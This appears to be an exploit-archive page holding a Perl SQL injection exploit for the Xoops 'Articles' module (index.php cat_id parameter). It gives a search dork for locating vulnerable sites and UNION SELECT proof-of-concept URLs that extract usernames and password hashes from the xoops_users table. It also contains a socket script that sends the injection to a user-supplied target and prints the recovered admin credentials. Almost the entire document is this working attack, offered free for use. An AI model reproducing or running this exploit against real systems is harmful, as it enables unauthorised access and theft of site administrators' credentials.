Xoops module Articles <= 1.03 (index.php cat_id) SQL Injection Exploit

#!/usr/bin/perl #[Script&nbsp;Name:&nbsp;Xoops&nbsp;module&nbsp;Articles&nbsp;<=&nbsp;1.02&nbsp;(index.php&nbsp;cat_id)&nbsp;SQL&nbsp;Injection&nbsp;Exploit #[Coded&nbsp;by&nbsp;&nbsp;&nbsp;:&nbsp;ajann #[Author&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;ajann #[Dork&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\"inurl:modules/articles/index.php?cat_id=\" #[Contact&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;:( #[S.Page&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://www.xoops.org/ #[$$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Free #[..&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;ajann,Turkey #&nbsp;PoC&nbsp;:&nbsp;modules/articles/index.php?cat_id=-1%20union%20select%201,2,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),4,5,6%20from%20xoops_users%20where%20uid%20like%201/* #&nbsp;PoC&nbsp;:&nbsp;modules/articles/index.php?cat_id=-1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),3,4%20from%20xoops_users%20where%20uid%20like%201/* use&nbsp;IO::Socket; if(@ARGV&nbsp;<&nbsp;1){ print&nbsp;\" [======================================================================== [//&nbsp;&nbsp;Xoops&nbsp;module&nbsp;Articles&nbsp;<=&nbsp;1.02&nbsp;(index.php&nbsp;cat_id)&nbsp;SQL&nbsp;Injection&nbsp;Exploit [//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Usage:&nbsp;exploit.pl&nbsp;[target] [//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Example:&nbsp;exploit.pl&nbsp;victim.com [//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Example:&nbsp;exploit.pl&nbsp;victim.com [//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Vuln&Exp&nbsp;:&nbsp;ajann [======================================================================== \"; exit(); } #Local&nbsp;variables $kapan&nbsp;=&nbsp;\"/*\"; $server&nbsp;=&nbsp;$ARGV[0]; $server&nbsp;=~&nbsp;s/(http://)//eg; $host&nbsp;=&nbsp;\"http://\".$server; $port&nbsp;=&nbsp;\"80\"; $file&nbsp;=&nbsp;\"/modules/articles/index.php?cat_id=\"; print&nbsp;\"Script&nbsp;<DIR>&nbsp;:&nbsp;\"; $dir&nbsp;=&nbsp;<STDIN>; chop&nbsp;($dir); if&nbsp;($dir&nbsp;=~&nbsp;/exit/){ print&nbsp;\"--&nbsp;Exploit&nbsp;Failed[You&nbsp;Are&nbsp;Exited]&nbsp; \"; exit(); } if&nbsp;($dir&nbsp;=~&nbsp;///){} else&nbsp;{ print&nbsp;\"--&nbsp;Exploit&nbsp;Failed[No&nbsp;DIR]&nbsp; \"; exit(); &nbsp;} print&nbsp;\"User&nbsp;ID&nbsp;(uid):&nbsp;\"; $id&nbsp;=&nbsp;<STDIN>; chop&nbsp;($id); $target&nbsp;=&nbsp;\"-1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),3,4%20from%20xoops_users%20where%20uid%20like%20\".$id.$kapan; $target&nbsp;=&nbsp;$host.$dir.$file.$target; #Writing&nbsp;data&nbsp;to&nbsp;socket print&nbsp;\"+**********************************************************************+ \"; print&nbsp;\"+&nbsp;Trying&nbsp;to&nbsp;connect:&nbsp;$server \"; $socket&nbsp;=&nbsp;IO::Socket::INET->new(Proto&nbsp;=>&nbsp;\"tcp\",&nbsp;PeerAddr&nbsp;=>&nbsp;\"$server\",&nbsp;PeerPort&nbsp;=>&nbsp;\"$port\")&nbsp;||&nbsp;die&nbsp;\" +&nbsp;Connection&nbsp;failed... \"; print&nbsp;$socket&nbsp;\"GET&nbsp;$target&nbsp;HTTP/1.1 \"; print&nbsp;$socket&nbsp;\"Host:&nbsp;$server \"; print&nbsp;$socket&nbsp;\"Accept:&nbsp;*/* \"; print&nbsp;$socket&nbsp;\"Connection:&nbsp;close \"; print&nbsp;\"+&nbsp;Connected!... \"; #Getting while($answer&nbsp;=&nbsp;<$socket>)&nbsp;{ if&nbsp;($answer&nbsp;=~&nbsp;/username:(.*?)pass/){ print&nbsp;\"+&nbsp;Exploit&nbsp;succeed!&nbsp;Getting&nbsp;admin&nbsp;information. \"; print&nbsp;\"+&nbsp;----------------&nbsp;+ \"; print&nbsp;\"+&nbsp;Username:&nbsp;$1 \"; } if&nbsp;($answer&nbsp;=~&nbsp;/password:(.*?)</a>/){ print&nbsp;\"+&nbsp;Password:&nbsp;$1 \"; } if&nbsp;($answer&nbsp;=~&nbsp;/Syntax&nbsp;error/)&nbsp;{&nbsp; print&nbsp;\"+&nbsp;Exploit&nbsp;Failed&nbsp;:&nbsp;(&nbsp; \"; print&nbsp;\"+**********************************************************************+ \"; exit();&nbsp; } if&nbsp;($answer&nbsp;=~&nbsp;/Internal&nbsp;Server&nbsp;Error/)&nbsp;{ print&nbsp;\"+&nbsp;Exploit&nbsp;Failed&nbsp;:&nbsp;(&nbsp;&nbsp; \"; print&nbsp;\"+**********************************************************************+ \"; exit();&nbsp; } &nbsp;} &nbsp;